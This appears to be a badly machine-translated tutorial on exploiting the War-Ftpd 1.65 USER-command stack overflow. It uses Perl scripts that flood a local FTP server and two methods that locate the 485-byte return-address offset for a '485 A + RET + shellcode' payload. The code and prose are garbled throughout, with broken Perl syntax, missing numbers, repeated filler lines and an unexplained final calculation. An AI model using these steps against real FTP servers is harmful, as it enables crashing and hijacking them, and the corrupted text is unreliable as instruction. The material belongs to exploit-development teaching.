Two methods to locate hejian overflow points

Text/security Angel SuperHei [BST]

_ Blank> vulnerability _ blank> Software: War-Ftpd version 1.65
Debug _ blank> Software: Ollydbg
Programming: perl

_ Blank> vulnerability Description: Creates a USER, resulting in stack overflow.
For some debugging problems, please refer to: Win32 Buffer Overflow practice _ blank> http://www.ph4nt0m.org/doc/20041101160955.pdf

We first simulate ftp login and write a script, and use AAAA to submit the user ..... indicates the number of times submitted using parameters. The overflow point we want to determine is the AAA ..... the number of our ret records that have just been overwritten.
----------- Codz start ---------------

#! /Usr/bin/perl
Use IO: Socket;

$ ARGC = @ ARGV;
$ Host = "127.0.0.1 ";
$ Port = "2121 ";
$ Eff = @ ARGV [0];
$ Buff = Ax $ eff;

My $ sock = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => $ host,
PeerPort => $ port) | die "Sorry! Cocould not connect to $ host ";
Print $ sock "USER $ buff ";
Print "USER $ buff ";
Close $ sock;

------------- Codz end ----------------

Next we use a 2-way method to determine this $ eff. First, we use ollydbg to load our War-Ftpd and run it.
We run the pl
C: usrin> exp. pl 800
USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
AAAAA

When we submit 800 A requests, overflow is triggered, and War-Ftpd fails. The eip value is 41414141.

Here we re-use the olldbg for debugging once, this time we submit 400:
C: usrin> exp. pl 400
USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Bytes
Bytes
Bytes
Bytes
AAAAA

In this case, the _ blank> vulnerability was not triggered at all, indicating that our ret was not overwritten by the AAAA we submitted. We can confirm
The value of $ eff is between and.

We are testing 550 A, _ blank> vulnerabilities, and we have triggered them again. Then we confirm that the value of $ eff is between and.
....................

Finally, when we submit 489 A records, the last 4 A records overwrite our return address (ret) ollydbg.
The eip of is exactly overwritten by 41414141, so we are sure that the overflow is reached :). That is, we can preliminarily determine the characters submitted by exp:
User aaaa... (485) + RET + ShellCode
Next, we need to confirm the shellcode address. We can see that our shellcode can be found near esp through debugging.
Then we can use the jump exp (or call esp) Address to overwrite RET, so our jump will be completed ...............
In fact, we have completed a small part of exp, mainly including the compilation and debugging of shellcode.
I am not familiar with it yet. I am trying to work hard at ing :).

B. Use two overflows to locate overflow points

This method was first seen on Anti-DDoS. The example is the last War-Ftpd version 1.65 user_blank> vulnerability.

1st off _ blank> code:
-------------- Codz-start -------------------
#! /Usr/bin/perl
Use IO: Socket;

$ Host = "127.0.0.1 ";
$ Port = "2121 ";

My $ sock = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => $ host,
PeerPort => $ port) | die "Sorry! Cocould not connect to $ host ";
Print $ sock "USER ";
# Key _ blank> code
For ($ I = 0; I I <800; $ I ++ ){
$ K = $ I % 10 + 100; # <= pay attention to this
Print $ sock chr ($ k );

Print chr ($ k );}
Print $ sock "";
Close $ sock;
---------------- Codz-end ---------------------

Load War-Ftpd with ollydbg and run it.
C: usrin> buff1.pl
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes
Bytes

We can see that we submitted a 10-digit letter between 100-109 and d-m to determine the ending number.
The overflow is triggered. At this time, the eip 0x6C6B6A69 corresponds to the lkji machine code arrangement, which exists in reverse order.
Therefore, the first ret address we cover is I, and the machine code is 0x69. The letter "d-m" with no segments starts with "d ".
The corresponding machine code is 0x64. We can determine that the end number of the submitted buff length is 0x69-0x64 = 5.
Cover ret.

2nd off _ blank> code:
-------------- Codz-start -------------------
#! /Usr/bin/perl
Use IO: Socket;

$ Host = "127.0.0.1 ";
$ Port = "2121 ";

My $ sock = IO: Socket: INET-> new (Proto => "tcp ",
PeerAddr => $ host,
PeerPort => $ port) | die "Sorry! Cocould not connect to $ host ";
Print $ sock "USER ";
# Key _ blank> code
For ($ I = 0; I I <800; $ I ++ ){
$ K = $ I/10 + 100; # <= pay attention to this
Print $ sock chr ($ k );

Print chr ($ k );}
Print $ sock "";
Close $ sock;
---------------- Codz-end ---------------------
Use ollydbg to reload War-Ftpd and run it.
C: usrin> buff1.pl
Bytes
Bytes
Detail {{{{{{{{{{
| | }}}}}}}}}}~~~~~~~~~~?????????? When there are too many threads, there are too many threads, too many threads
Please refer to the following link for more information:
Please refer to the following link for more information:
Please refer to the following link for more information:
Please refer to the following link for more information #####
Please refer to the following link for more information:
Saddle-North

At this time, the eip is 0x94949494, which is used to determine the overflow in that segment: 0x94-0x64 = 48, so we can confirm

Based on the above two overflows, the overflow point is: (0x94-0x64) x10 + (0x69-0x64) = 485, that is, when we submit a 485
The buff starts to overwrite ret. 6e-64x100 + 80-64 = 1122